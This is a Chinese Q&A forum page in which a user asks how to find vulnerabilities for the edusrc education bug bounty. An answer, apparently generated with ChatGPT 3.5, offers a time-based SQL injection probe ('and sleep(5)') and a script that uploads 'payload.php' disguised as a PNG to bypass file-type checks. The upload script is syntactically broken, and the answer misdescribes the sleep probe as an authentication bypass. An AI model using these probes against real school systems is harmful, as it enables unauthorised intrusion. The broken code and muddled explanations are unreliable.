目前挖了两天没啥思路,找了些已经爆出的poc进行批量检测,对一些能登陆的站点的功能点进行检测,但是都没啥收获,有没有挖洞师傅来分享下挖edusrc的干货
1条回答 默认 最新
关注让阿豪来帮你解答,本回答参考chatgpt3.5编写提供,如果还有疑问可以评论或留言
问题描述: 如何有效地挖掘edusrc漏洞? 解答: 挖掘edusrc漏洞需要掌握以下几个方面: 1.理解edusrc系统结构和相关技术特征,例如CMS、Web框架、Web应用程序接口、注入技术等等。 2.找到漏洞利用的铺垫,例如未授权访问、SQL注入、XSS跨站脚本攻击等。 3.使用合适的工具和技术进行漏洞扫描,例如Nessus、Metasploit、sqlmap等。 4.编写自动化脚本进行批量化检测。 以下是一些挖掘edusrc漏洞的案例和代码: 案例一:SQL注入漏洞 攻击者通过注入恶意SQL语句绕过edusrc系统的身份验证,在未授权的情况下访问敏感信息。 漏洞路径:/index.php?m=poster&&a=shownew&id=1 攻击载荷:/index.php?m=poster&&a=shownew&id=1 and sleep(5) 代码示例: import requests import time payload = "1 and sleep(5)" url = "https://www.example.com/index.php?m=poster&&a=shownew&id=" + payload start_time = time.time() requests.get(url) if time.time() - start_time > 5:print("Vulnerable!")案例二:文件上传漏洞 攻击者通过上传恶意文件或代码,进一步控制edusrc系统,使其执行攻击者的指令或下载恶意软件。 漏洞路径:/content/uploadfile.php 攻击载荷:查找允许上传的文件类型,例如.jpg、.png、.gif等,将各个文件格式的文件头部分拼接到上传的文件中,以绕过edusrc系统的文件类型判断。 代码示例: import requests url = "https://www.example.com/content/uploadfile.php" headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3', 'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW'} data = "------WebKitFormBoundary7MA4YWxkTrZu0gW\r\nContent-Disposition: form-data; name="file"; filename="payload.php"\r\nContent-Type: image/png\r\n\r\n\r\n------WebKitFormBoundary7MA4YWxkTrZu0gW--\r\n" response = requests.post(url, headers=headers, data=data) if response.status_code == 200 and "upload success" in response.text: print("Vulnerable!") 总结: 挖掘edusrc漏洞需要综合运用多种技术和工具,并掌握各种漏洞攻击技术,可以通过不断实践和学习来提升技能。但需要注意,漏洞扫描、攻击、测试等行为需要遵守法律法规和道德准则,确保不会产生任何恶劣后果。
解决 无用评论 打赏举报
分享
- 2022-10-04 00:38回答 2 已采纳 题主你好针对问题1:1.容易踩坑的地方,电脑串口通信也好,Arduino串口通信也好,传递的数据均为一个一个的ascii码,故需要进行转换,比如int转字符,字符转string等2.如果你是想要控制电
- 2021-10-22 13:58回答 1 已采纳 sso就是一个概念,同个公司不同账号,可以使用同一套账号登录就是sso。我们直接用一个数据库啊。
- 2020-03-22 14:29回答 1 已采纳 应该是你的js里有对ua的判断,但是你的js混淆压缩过了,你得调试下。wechat的ua里面有micromessenger,应该有相关判断
- 2024-04-29 20:41Yb9msxx的博客 这里插个广告,欢迎大家关注我,以后有更多干货分享给大家对于新人刚开设挖edusrc的时候需要花大量的时间来找系统和信息收集,当你遇见的系统又waf的时候可以适当的放弃别再这上面花时间了,列入sql注入,一个单引号...
- 2018-12-10 11:53回答 1 已采纳 https://blog.csdn.net/wuhenzhangxing/article/details/45173687
- 2018-04-23 07:35回答 11 已采纳 如果你用的是同一个浏览器 只不过是打开两个窗口 当你点击退出的时候 会发送一个请求给后台 然后后台清空session等信息 这样的话 在去另一个页面就会需要登录的 这是最简单的做法
- 2018-10-05 22:38大方子的博客 如果你刚开始挖漏洞的话,可以试试刷点edusrc啦,cnvd啦奖励都是不错的,虽然都只是积分累计换京东卡,但是如果你挖到一个通用漏洞,可以批量提交对吧。 慢慢的深入挖点补天啦,盒子啦之类的,只要现金不要库币和...
- 2021-04-06 11:24Python之好!的博客 开始之前做个自我介绍,我是来自F0tsec团队的Subs,也是刚接触安全没有多久的菜狗,刚趁着安全客推荐的平台活动,尝试了三天漏洞挖掘,我运气挺好的(挖到了四个低危,2个中危,一个严重漏洞),也因此结实了SRC年度...
- 2021-08-04 11:43雨笋教育的博客 近期漏洞挖掘又有小发现,雨笋教育小编来给大家分享干货了 写在前面 最近挖的0day,可以getshell众多学校,这里分享下挖掘技巧,过程也是挺奇幻的~ 过程 1.首先访问目标站点:http://x.x.x.x/default.aspx 可以...
- 2017-09-13 21:05蚁景网安实验室的博客 点击“合天智汇”关注,学习网安干货 0x00 介绍 文件包含漏洞:即File Inclusion,意思是文件包含(漏洞),是指当服务器开启allow_url_include选项时,就...
- 2024-04-23 10:32程序员橙橙的博客 请不要对未授权厂商、未分配给自己的项目、超出测试范围的列表进行漏洞挖掘,可与管理员联系确认是否属于资产范围后进行挖掘,否则未授权的法律风险将由漏洞挖掘者自己承担。 12.禁止拖库、随意大量增删改他人信息,...
- 2023-06-28 22:36北山安全学院的博客 src漏洞挖掘思路教学 存储的self-xss变有效xss(两个iframe实现)
- 2023-07-02 11:18北山安全学院的博客 参考文献: A fresh look on reverse proxy related attacks Nginx配置不当可能导致的安全问题 北山安全学院src挖掘实战教学 漏洞挖掘知识星球开放(涵盖edusrc&企业src挖洞技巧干货满满!) 免费付费文档阅读+...
- 没有解决我的问题, 去提问
问题事件
已结题
(查看结题原因) 3月25日-
创建了问题
3月25日
悬赏问题
- ¥15 MATLAB运行显示错误,如何解决?
- ¥15 c++头文件不能识别CDialog
- ¥15 Excel发现不可读取的内容
- ¥15 UE5#if WITH_EDITOR导致打包的功能不可用
- ¥15 关于#stm32#的问题:CANOpen的PDO同步传输问题
- ¥20 yolov5自定义Prune报错,如何解决?
- ¥15 电磁场的matlab仿真
- ¥15 mars2d在vue3中的引入问题
- ¥50 h5唤醒支付宝并跳转至向小荷包转账界面
- ¥15 算法题:数的划分,用记忆化DFS做WA求调